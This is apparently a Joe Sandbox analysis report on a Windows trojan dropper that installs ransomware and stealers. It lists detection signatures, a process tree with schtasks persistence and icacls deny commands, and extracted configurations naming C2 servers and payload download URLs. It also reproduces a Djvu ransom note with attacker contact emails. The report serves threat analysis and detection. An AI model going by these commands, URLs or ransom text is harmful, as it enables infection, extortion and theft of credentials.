Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
CHA0VZiz8y.exe

Overview

General Information

Sample name:CHA0VZiz8y.exe
renamed because original name is a hash value
Original sample name:f0587649682207064554a2372966435d.exe
Analysis ID:1447491
MD5:f0587649682207064554a2372966435d
SHA1:2e8b948dfcffceb8acf550a585d2ea127f28f41f
SHA256:6bd479dd9293043d4149641897629169df609adf72926d32adfe0094c583828e
Tags:64exetrojan
Infos:

Detection

CryptOne, Djvu, Mars Stealer, PureLog Stealer, RedLine, RisePro Stealer, Vidar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected AntiVM3
Yara detected CryptOne packer
Yara detected Djvu Ransomware
Yara detected Mars stealer
Yara detected Powershell download and execute
Yara detected PureLog Stealer
Yara detected RedLine Stealer
Yara detected RisePro Stealer
Yara detected Vidar stealer
Yara detected zgRAT
Adds extensions / path to Windows Defender exclusion list (Registry)
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Creates HTML files with .exe extension (expired dropper behavior)
Creates multiple autostart registry keys
Disable Windows Defender real time protection (registry)
Disables Windows Defender (deletes autostart)
Drops PE files to the document folder of the user
Exclude list of file types from scheduled, custom, and real-time scanning
Found direct / indirect Syscall (likely to bypass EDR)
Hides threads from debuggers
Injects a PE file into a foreign processes
Installs new ROOT certificates
Machine Learning detection for dropped file
Modifies Group Policy settings
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
PE file contains section with special chars
PE file has nameless sections
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses process hollowing technique
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates or modifies windows services
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops certificate files (DER)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Enables security privileges
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
File is packed with WinRar
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
PE file does not import any functions
Queries disk information (often used to detect virtual machines)
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for user specific document files
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Potentially Suspicious Rundll32 Activity
Sigma detected: Windows Defender Exclusions Added - Registry
Uses Microsoft's Enhanced Cryptographic Provider
Uses cacls to modify the permissions of files
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic
Yara signature match

Classification

  • System is w10x64
  • CHA0VZiz8y.exe (PID: 4120 cmdline: "C:\Users\user\Desktop\CHA0VZiz8y.exe" MD5: F0587649682207064554A2372966435D)
    • _ebPmq_TcwNignYm0bf0ytJM.exe (PID: 2300 cmdline: C:\Users\user\Documents\SimpleAdobe\_ebPmq_TcwNignYm0bf0ytJM.exe MD5: 9A78F27AA9D999EEE10CB154BA964869)
    • 7U1bGcxK3Lqi_XMHDNEdJrhB.exe (PID: 3680 cmdline: C:\Users\user\Documents\SimpleAdobe\7U1bGcxK3Lqi_XMHDNEdJrhB.exe MD5: ADD437E239EBA1CEABCA80AF38F80B56)
      • 7U1bGcxK3Lqi_XMHDNEdJrhB.exe (PID: 5316 cmdline: C:\Users\user\Documents\SimpleAdobe\7U1bGcxK3Lqi_XMHDNEdJrhB.exe MD5: ADD437E239EBA1CEABCA80AF38F80B56)
        • icacls.exe (PID: 7628 cmdline: icacls "C:\Users\user\AppData\Local\cd606818-a84b-463e-828b-b93214ba547c" /deny *S-1-1-0:(OI)(CI)(DE,DC) MD5: 2E49585E4E08565F52090B144062F97E)
    • xS7PhKcNZTx4FuBAD1RB9kbJ.exe (PID: 3944 cmdline: C:\Users\user\Documents\SimpleAdobe\xS7PhKcNZTx4FuBAD1RB9kbJ.exe MD5: 0951BF8665040A50D5FB548BE6AC7C1D)
    • ogoGQsWFwF_EcodN5qF7hiVC.exe (PID: 3056 cmdline: C:\Users\user\Documents\SimpleAdobe\ogoGQsWFwF_EcodN5qF7hiVC.exe MD5: 22152460B13E4C2473DC3FCDEA192933)
      • RegAsm.exe (PID: 2888 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
      • RegAsm.exe (PID: 5228 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
    • Zy329tNpRVznAcNUeSg4uGuQ.exe (PID: 1400 cmdline: C:\Users\user\Documents\SimpleAdobe\Zy329tNpRVznAcNUeSg4uGuQ.exe MD5: 6151F5177B7B35E3D7CEE99A2FC9AF24)
    • J9jGBSSbDD3yrTx79DzmOLls.exe (PID: 3652 cmdline: C:\Users\user\Documents\SimpleAdobe\J9jGBSSbDD3yrTx79DzmOLls.exe MD5: D816AEC818E5BE0A3B7AF1AEA4BCA1D8)
      • RegAsm.exe (PID: 2884 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
    • zfQlIB6J8n2u_zLV5LHnA1xW.exe (PID: 3920 cmdline: C:\Users\user\Documents\SimpleAdobe\zfQlIB6J8n2u_zLV5LHnA1xW.exe MD5: E22EFC95638F4C4E07FD7DABA5BD3154)
      • kat806.tmp (PID: 3652 cmdline: C:\Users\user\AppData\Local\Temp\kat806.tmp MD5: 66064DBDB70A5EB15EBF3BF65ABA254B)
    • ZMyjNtrJZsXoQ4xLeKYzrWJD.exe (PID: 4268 cmdline: C:\Users\user\Documents\SimpleAdobe\ZMyjNtrJZsXoQ4xLeKYzrWJD.exe MD5: C0FEE8DB6325C8C1B3F8CCD13574C65A)
    • A_22rjVO67ooiUk2ueyL6tMl.exe (PID: 6444 cmdline: C:\Users\user\Documents\SimpleAdobe\A_22rjVO67ooiUk2ueyL6tMl.exe MD5: D9A7D15AE1511095BC12D4FAA9BE6F70)
      • MSBuild.exe (PID: 7648 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
    • EPA5EhRzK9ZnpAjdUqLJteUs.exe (PID: 6096 cmdline: C:\Users\user\Documents\SimpleAdobe\EPA5EhRzK9ZnpAjdUqLJteUs.exe MD5: F57F726F9E1B8C24B4F7C275FFAC78CF)
      • schtasks.exe (PID: 2232 cmdline: schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST MD5: 48C2FE20575769DE916F48EF0676A965)
        • conhost.exe (PID: 7232 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 7364 cmdline: schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST MD5: 48C2FE20575769DE916F48EF0676A965)
        • conhost.exe (PID: 7372 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • _rSi8sV87ppx0bgkbETdFbEZ.exe (PID: 4676 cmdline: C:\Users\user\Documents\SimpleAdobe\_rSi8sV87ppx0bgkbETdFbEZ.exe MD5: 8B7B381CF7D4F577009F99FCE7E5FD39)
      • _rSi8sV87ppx0bgkbETdFbEZ.tmp (PID: 2676 cmdline: "C:\Users\user\AppData\Local\Temp\is-KE107.tmp\_rSi8sV87ppx0bgkbETdFbEZ.tmp" /SL5="$4042A,5528781,54272,C:\Users\user\Documents\SimpleAdobe\_rSi8sV87ppx0bgkbETdFbEZ.exe" MD5: 73919C5267ECFF99768AE00DFA5D9C3F)
        • turquoisecdplayer.exe (PID: 4204 cmdline: "C:\Users\user\AppData\Local\Turquoise CD Player\turquoisecdplayer.exe" -i MD5: 578530F1C73BA58C2D868B45C7223945)
    • MYZqYdU5cUVwEz2j0JYbnTar.exe (PID: 5736 cmdline: C:\Users\user\Documents\SimpleAdobe\MYZqYdU5cUVwEz2j0JYbnTar.exe MD5: 32D986D13D2B4B6ACDC7ACE345D66BD4)
      • control.exe (PID: 7320 cmdline: "C:\Windows\System32\control.exe" "C:\Users\user\AppData\Local\Temp\eKhLlZQ.CPL", MD5: EBC29AA32C57A54018089CFC9CACAFE8)
        • rundll32.exe (PID: 7404 cmdline: "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\user\AppData\Local\Temp\eKhLlZQ.CPL", MD5: 889B99C52A60DD49227C5E485A016679)
    • FIxDICT7hSLYFeTzbHHqKZ7Z.exe (PID: 6208 cmdline: C:\Users\user\Documents\SimpleAdobe\FIxDICT7hSLYFeTzbHHqKZ7Z.exe MD5: 3955AF54FBAC1E43C945F447D92E4108)
    • 0YXJTGaxIrryNdvx7SKozTjt.exe (PID: 5556 cmdline: C:\Users\user\Documents\SimpleAdobe\0YXJTGaxIrryNdvx7SKozTjt.exe MD5: 029B4A16951A6FB1F6A1FDA9B39769B7)
    • EEmC0rfrxeQDEUW4Qmh7BQX4.exe (PID: 5276 cmdline: C:\Users\user\Documents\SimpleAdobe\EEmC0rfrxeQDEUW4Qmh7BQX4.exe MD5: EEAB6B508F842CE18D229914CD7167F7)
    • RPA18tS89oJgBrOTDKzODMll.exe (PID: 5372 cmdline: C:\Users\user\Documents\SimpleAdobe\RPA18tS89oJgBrOTDKzODMll.exe MD5: D43AC79ABE604CAFFEFE6313617079A3)
    • g_XGqx6vQcj4WvdQ2CmFiUpM.exe (PID: 5416 cmdline: C:\Users\user\Documents\SimpleAdobe\g_XGqx6vQcj4WvdQ2CmFiUpM.exe MD5: 3542F60DFEF8BA16451AB6097587BF63)
      • Install.exe (PID: 5676 cmdline: .\Install.exe MD5: 0EC8D7480C7D858848914B24584B17B4)
        • Install.exe (PID: 7448 cmdline: .\Install.exe /jfXIEdidloJv "525403" /S MD5: C5FBFA06070EF1EA150FA88E1B6C6684)
  • svchost.exe (PID: 5780 cmdline: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 5708 cmdline: C:\Windows\System32\svchost.exe -k NetSvcs -p -s NcaSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 5520 cmdline: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 7608 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
STOP, DjvuSTOP Djvu Ransomware it is a ransomware which encrypts user data through AES-256 and adds one of the dozen available extensions as marker to the encrypted file's name. It is not used to encrypt the entire file but only the first 5 MB. In its original version it was able to run offline and, in that case, it used a hard-coded key which could be extracted to decrypt files.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stop
NameDescriptionAttributionBlogpost URLsLink
RedLine StealerRedLine Stealer is a malware available on underground forums for sale apparently as standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer
NameDescriptionAttributionBlogpost URLsLink
VidarVidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.vidar
{"C2 url": ["https://steamcommunity.com/profiles/76561199689717899"], "Botnet": "c21b45a432889af65aa05cd66920d0a2", "Version": "9.8"}
{"Download URLs": [""], "C2 url": "http://cajgtus.com/lancer/get.php", "Ransom note file": "_readme.txt", "Ransom note": "ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nDo not ask assistants from youtube and recovery data sites for help in recovering your data.\r\nThey can use your free decryption quota and scam you.\r\nOur contact is emails in this text document only.\r\nYou can get and look video overview decrypt tool:\r\nhttps://wetransfer.com/downloads/33b490a613f49fa190924f199d2c079e20240512191214/caaf73\r\nPrice of private key and decrypt software is $999.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $499.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@freshingmail.top\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelpyou@airmail.cc\r\n\r\nYour personal ID:\r\n0873PsawqS", "Ignore Files": ["ntuser.dat", "ntuser.dat.LOG1", "ntuser.dat.LOG2", "ntuser.pol", ".sys", ".ini", ".DLL", ".dll", ".blf", ".bat", ".lnk", ".regtrans-ms", "C:\\SystemID\\", "C:\\Users\\Default User\\", "C:\\Users\\Public\\", "C:\\Users\\All Users\\", "C:\\Users\\Default\\", "C:\\Documents and Settings\\", "C:\\ProgramData\\", "C:\\Recovery\\", "C:\\System Volume Information\\", "C:\\Users\\%username%\\AppData\\Roaming\\", "C:\\Users\\%username%\\AppData\\Local\\", "C:\\Windows\\", "C:\\PerfLogs\\", "C:\\ProgramData\\Microsoft\\", "C:\\ProgramData\\Package Cache\\", "C:\\Users\\Public\\", "C:\\$Recycle.Bin\\", "C:\\$WINDOWS.~BT\\", "C:\\dell\\", "C:\\Intel\\", "C:\\MSOCache\\", "C:\\Program Files\\", "C:\\Program Files (x86)\\", "C:\\Games\\", "C:\\Windows.old\\", "D:\\Users\\%username%\\AppData\\Roaming\\", "D:\\Users\\%username%\\AppData\\Local\\", "D:\\Windows\\", "D:\\PerfLogs\\", "D:\\ProgramData\\Desktop\\", "D:\\ProgramData\\Microsoft\\", "D:\\ProgramData\\Package Cache\\", "D:\\Users\\Public\\", "D:\\$Recycle.Bin\\", "D:\\$WINDOWS.~BT\\", "D:\\dell\\", "D:\\Intel\\", "D:\\MSOCache\\", "D:\\Program Files\\", "D:\\Program Files (x86)\\", "D:\\Games\\", "E:\\Users\\%username%\\AppData\\Roaming\\", "E:\\Users\\%username%\\AppData\\Local\\", "E:\\Windows\\", "E:\\PerfLogs\\", "E:\\ProgramData\\Desktop\\", "E:\\ProgramData\\Microsoft\\", "E:\\ProgramData\\Package Cache\\", "E:\\Users\\Public\\", "E:\\$Recycle.Bin\\", "E:\\$WINDOWS.~BT\\", "E:\\dell\\", "E:\\Intel\\", "E:\\MSOCache\\", "E:\\Program Files\\", "E:\\Program Files (x86)\\", "E:\\Games\\", "F:\\Users\\%username%\\AppData\\Roaming\\", "F:\\Users\\%username%\\AppData\\Local\\", "F:\\Windows\\", "F:\\PerfLogs\\", "F:\\ProgramData\\Desktop\\", "F:\\ProgramData\\Microsoft\\", "F:\\Users\\Public\\", "F:\\$Recycle.Bin\\", "F:\\$WINDOWS.~BT\\", "F:\\dell\\", "F:\\Intel\\"], "Public Key": "-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA8xYa6j6LzNJB2kuwO9Xc\\\\nSWMnTH6B2dX\\/XX8jCZc7kUlSg50HcwN2bYxLmKAwhfJZPFIYAufx4nMDKTEKIK5\\/\\\\n4RtQWlcufmpr7vcIJMnyyxwwyni9YfRUJR5VIIhfKzQE3gIQZ29b3M6dqzQeQ+oX\\\\nxHUQPadvTz\\/oYY7IbyFLZsHCxHKG2G2v4Yg4SX0nqMuvuzdAT+fLgmZd1ENiuf4U\\\\nWhF6Td3TAs0EkPT6MrxIXCKIQS5LAXEBcAlxRfv4QU03yP7NBxk4\\/gW6l4kV3RuO\\\\nbgqMAuPe3AkrIuOm1zi5FGsr7e8Y8KYE\\/RfQnJe+eOsmXlnhEpJGk1OLIrGxPETz\\\\nUQIDAQAB\\\\n-----END PUBLIC KEY-----"}
{"C2 url": "5.42.65.115:40551", "Bot Id": "LogsDiller Cloud (TG: @logsdillabot)", "Authorization Header": "3a050df92d0cf082b2cdaf87863616be"}
SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\G1Y1cICOYjk_P6MTvNhL7sj.zipJoeSecurity_RiseProStealerYara detected RisePro StealerJoe Security
    C:\Users\user\AppData\Local\Temp\i2FqtYqlXCxQLo2ZIevRzA8.zipJoeSecurity_RiseProStealerYara detected RisePro StealerJoe Security
      C:\Users\user\Documents\SimpleAdobe\A_22rjVO67ooiUk2ueyL6tMl.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
        SourceRuleDescriptionAuthorStrings
        0000000E.00000002.2606812448.0000000003C8C000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
          00000009.00000002.2293452659.0000000000477000.00000004.00000001.01000000.00000009.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
            0000000C.00000002.2320846713.0000000004319000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_CryptYara detected CryptOne packerJoe Security
              00000029.00000002.2465855956.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                00000007.00000002.2311748071.0000000002170000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
                • 0x798:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
                Click to see the 26 entries
                SourceRuleDescriptionAuthorStrings
                26.2.RegAsm.exe.400000.0.unpackINDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulationDetects executables containing potential Windows Defender anti-emulation checksditekSHen
                • 0x20df0:$s1: JohnDoe
                • 0x20de8:$s2: HAL9TH
                9.2.ogoGQsWFwF_EcodN5qF7hiVC.exe.477ac0.1.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                  9.2.ogoGQsWFwF_EcodN5qF7hiVC.exe.477ac0.1.unpackINDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulationDetects executables containing potential Windows Defender anti-emulation checksditekSHen
                  • 0x201f0:$s1: JohnDoe
                  • 0x201e8:$s2: HAL9TH
                  11.2.J9jGBSSbDD3yrTx79DzmOLls.exe.aa0000.0.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                    12.2.zfQlIB6J8n2u_zLV5LHnA1xW.exe.4510000.2.raw.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                      Click to see the 43 entries

                      System Summary

                      barindex
                      Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\AdobeUpdaterV168_bdca866007fb255201297d2a15a49513\AdobeUpdaterV168.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Documents\SimpleAdobe\Zy329tNpRVznAcNUeSg4uGuQ.exe, ProcessId: 1400, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AdobeUpdaterV168_bdca866007fb255201297d2a15a49513
                      Source: Process startedAuthor: juju4, Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\user\AppData\Local\Temp\eKhLlZQ.CPL",, CommandLine: "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\user\AppData\Local\Temp\eKhLlZQ.CPL",, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: "C:\Windows\System32\control.exe" "C:\Users\user\AppData\Local\Temp\eKhLlZQ.CPL", , ParentImage: C:\Windows\SysWOW64\control.exe, ParentProcessId: 7320, ParentProcessName: control.exe, ProcessCommandLine: "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\user\AppData\Local\Temp\eKhLlZQ.CPL",, ProcessId: 7404, ProcessName: rundll32.exe
                      Source: Registry Key setAuthor: Christian Burkard (Nextron Systems): Data: Details: 1, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\CHA0VZiz8y.exe, ProcessId: 4120, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{7F44006F-4BAB-480A-9050-95ACCAEC3314}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Exclusions_Extensions
                      Source: Process startedAuthor: vburov: Data: Command: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc, CommandLine: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc, ProcessId: 5780, ProcessName: svchost.exe
                      No Snort rule has matched

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Source: CHA0VZiz8y.exeAvira: detected
                      Source: https://lop.foxesjoy.com/RAvira URL Cloud: Label: malware
                      Source: http://147.45.47.149:54674/vape/niko.exeAvira URL Cloud: Label: malware
                      Source: https://lop.foxesjoy.com:80/ssl/crt.exeAvira URL Cloud: Label: malware
                      Source: http://5.42.66.10/download/th/space.php#Avira URL Cloud: Label: malware
                      Source: http://91.202.233.232/o2i3jroi23joj23ikrjokij3oroi.exeAvira URL Cloud: Label: malware
                      Source: http://f.alie3ksggg.com/f/oiii.exeAvira URL Cloud: Label: malware
                      Source: http://5.42.66.10/download/th/getimage15.phpAvira URL Cloud: Label: malware
                      Source: https://kurd.computer/dll/builddoc.exeAvira URL Cloud: Label: malware
                      Source: http://85.192.56.26/api/bing_release.phpAvira URL Cloud: Label: malware
                      Source: https://f.123654987.xyz/525403/setup.exeUAvira URL Cloud: Label: malware
                      Source: https://lop.foxesjoy.com/Avira URL Cloud: Label: malware
                      Source: https://lop.foxesjoy.com/ssl/crt.exee-Avira URL Cloud: Label: malware
                      Source: http://85.192.56.26/api/flash.phpAvira URL Cloud: Label: malware
                      Source: https://monoblocked.com/525403/setup.exeAvira URL Cloud: Label: malware
                      Source: http://176.111.174.109/pelikanAvira URL Cloud: Label: malware
                      Source: C:\ProgramData\qhbnnmvggfhr\bkqtzupkspiy.exeAvira: detection malicious, Label: TR/Staser.ykqao
                      Source: C:\ProgramData\JANA timezone 2.12.66\JANA timezone 2.12.66.exeAvira: detection malicious, Label: HEUR/AGEN.1324352
                      Source: 00000009.00000002.2293452659.0000000000477000.00000004.00000001.01000000.00000009.sdmpMalware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199689717899"], "Botnet": "c21b45a432889af65aa05cd66920d0a2", "Version": "9.8"}
                      Source: 00000007.00000002.2311839298.0000000002210000.00000040.00001000.00020000.00000000.sdmpMalware Configuration Extractor: Djvu {"Download URLs": [""], "C2 url": "http://cajgtus.com/lancer/get.php", "Ransom note file": "_readme.txt", "Ransom note": "ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nDo not ask assistants from youtube and recovery data sites for help in recovering your data.\r\nThey can use your free decryption quota and scam you.\r\nOur contact is emails in this text document only.\r\nYou can get and look video overview decrypt tool:\r\nhttps://wetransfer.com/downloads/33b490a613f49fa190924f199d2c079e20240512191214/caaf73\r\nPrice of private key and decrypt software is $999.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $499.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@freshingmail.top\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelpyou@airmail.cc\r\n\r\nYour personal ID:\r\n0873PsawqS", "Ignore Files": ["ntuser.dat", "ntuser.dat.LOG1", "ntuser.dat.LOG2", "ntuser.pol", ".sys", ".ini", ".DLL", ".dll", ".blf", ".bat", ".lnk", ".regtrans-ms", "C:\\SystemID\\", "C:\\Users\\Default User\\", "C:\\Users\\Public\\", "C:\\Users\\All Users\\", "C:\\Users\\Default\\", "C:\\Documents and Settings\\", "C:\\ProgramData\\", "C:\\Recovery\\", "C:\\System Volume Information\\", "C:\\Users\\%username%\\AppData\\Roaming\\", "C:\\Users\\%username%\\AppData\\Local\\", "C:\\Windows\\", "C:\\PerfLogs\\", "C:\\ProgramData\\Microsoft\\", "C:\\ProgramData\\Package Cache\\", "C:\\Users\\Public\\", "C:\\$Recycle.Bin\\", "C:\\$WINDOWS.~BT\\", "C:\\dell\\", "C:\\Intel\\", "C:\\MSOCache\\", "C:\\Program Files\\", "C:\\Program Files (x86)\\", "C:\\Games\\", "C:\\Windows.old\\", "D:\\Users\\%username%\\AppData\\Roaming\\", "D:\\Users\\%username%\\AppData\\Local\\", "D:\\Windows\\", "D:\\PerfLogs\\", "D:\\ProgramData\\Desktop\\", "D:\\ProgramData\\Microsoft\\", "D:\\ProgramData\\Package Cache\\", "D:\\Users\\Public\\", "D:\\$Recycle.Bin\\", "D:\\$WINDOWS.~BT\\", "D:\\dell\\", "D:\\Intel\\", "D:\\MSOCache\\", "D:\\Program Files\\", "D:\\Program Files (x86)\\", "D:\\Games\\", "E:\\Users\\%username%\\AppData\\Roaming\\", "E:\\Users\\%username%\\AppData\\Local\\", "E:\\Windows\\", "E:\\PerfLogs\\", "E:\\ProgramData\\Desktop\\", "E:\\ProgramData\\Microsoft\\", "E:\\ProgramData\\Package Cache\\", "E:\\Users\\Public\\", "E:\\$Recycle.Bin\\", "E:\\$WINDOWS.~BT\\", "E:\\de
                      Source: 11.2.J9jGBSSbDD3yrTx79DzmOLls.exe.aa0000.0.unpackMalware Configuration Extractor: RedLine {"C2 url": "5.42.65.115:40551", "Bot Id": "LogsDiller Cloud (TG: @logsdillabot)", "Authorization Header": "3a050df92d0cf082b2cdaf87863616be"}
                      Source: http://5.42.66.10/download/th/retail.phphpVirustotal: Detection: 6%Perma Link
                      Source: http://147.45.47.149:54674/vape/niko.exeVirustotal: Detection: 14%Perma Link
